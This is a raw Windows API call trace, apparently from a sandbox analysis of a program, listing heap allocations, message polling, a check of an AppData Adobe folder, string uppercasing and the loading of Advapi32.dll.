0x24b2ce8 [0207.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0207.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0207.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0207.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0207.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0207.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0207.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0207.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0207.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0207.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0207.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0207.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0207.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0207.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0207.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0207.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0207.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0207.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0207.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0207.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0207.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0207.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0207.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0207.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0207.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0207.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0207.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0207.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0207.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0207.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0207.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0207.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0207.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0207.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0207.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0207.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0207.677] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0207.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0207.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0207.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0207.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0207.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0207.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0207.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0207.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0207.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0207.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0207.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0207.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0207.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0207.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0207.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0207.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0207.677] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0207.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0207.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0207.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0207.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0207.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0207.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0207.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0207.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0207.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0207.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0207.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0207.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0207.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0207.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0207.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0207.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0207.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0207.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0207.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0207.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0207.678] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Adobe", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4d052f, dwReserved1=0x6d2c, cFileName="Adobe", cAlternateFileName="")) returned 0xaa5760 [0207.679] FindClose (in: hFindFile=0xaa5760 | out: hFindFile=0xaa5760) returned 1 [0207.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0207.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0207.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0207.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0207.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0207.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0207.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0207.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0207.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0207.679] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0207.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0207.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0207.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0207.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0207.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0207.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0207.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0207.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0207.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0207.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0207.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0207.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0207.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0207.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0207.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0207.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0207.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0207.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0207.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0207.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0207.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0207.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0207.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0207.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0207.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0207.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0207.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0207.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0207.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0207.681] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0207.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0207.681] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0207.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0207.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0207.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6d0 [0207.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0207.681] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0207.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0207.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0207.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0207.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0207.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0207.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0207.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0207.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0207.682] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0207.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0207.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0207.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0207.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0207.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0207.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0207.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0207.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0207.682] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0207.682] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0207.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0207.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0207.682] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0207.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0207.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0207.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa610 [0207.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0207.683] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0207.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0207.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0207.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0207.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0207.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0207.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0207.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0207.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0207.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0207.683] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0207.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0207.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0207.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0207.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0207.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0207.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0207.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0207.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0207.684] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0207.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0207.684] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0207.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0207.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0207.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0207.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0207.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0207.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0207.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0207.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0207.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0207.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0207.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0207.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0207.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0207.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0207.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0207.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0207.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0207.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0207.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0207.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0207.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0207.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0207.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0207.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0207.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0207.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0207.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0207.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0207.685] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0207.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0207.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0207.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0207.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0207.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0207.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0207.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0207.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0207.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0207.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0207.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0207.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0207.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0207.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0207.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0207.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0207.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0207.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0207.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0207.686] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0207.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0207.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0207.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) 